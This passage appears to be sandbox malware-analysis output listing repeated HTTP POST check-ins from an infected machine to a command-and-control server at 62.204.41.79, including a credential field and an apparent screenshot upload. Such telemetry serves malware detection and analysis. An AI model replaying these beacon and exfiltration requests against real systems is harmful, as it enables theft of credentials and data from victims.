Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Host: 62.204.41.79Content-Length: 21Content-Type: application/x-www-form-urlencodedData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 63 72 65 64 3d Data Ascii: id=853321935212&cred=
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----MTA1ODE2Host: 62.204.41.79Content-Length: 105968Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
Source: global traffic HTTP traffic detected: POST /fb73jc3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.79Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 30 26 73 64 3d 65 34 61 36 33 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 30 26 70 63 3d 33 30 35 30 39 30 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.60&sd=e4a636&os=1&bi=1&ar=0&pc=305090&un=user&dm=&av=13&lv=0&og=1
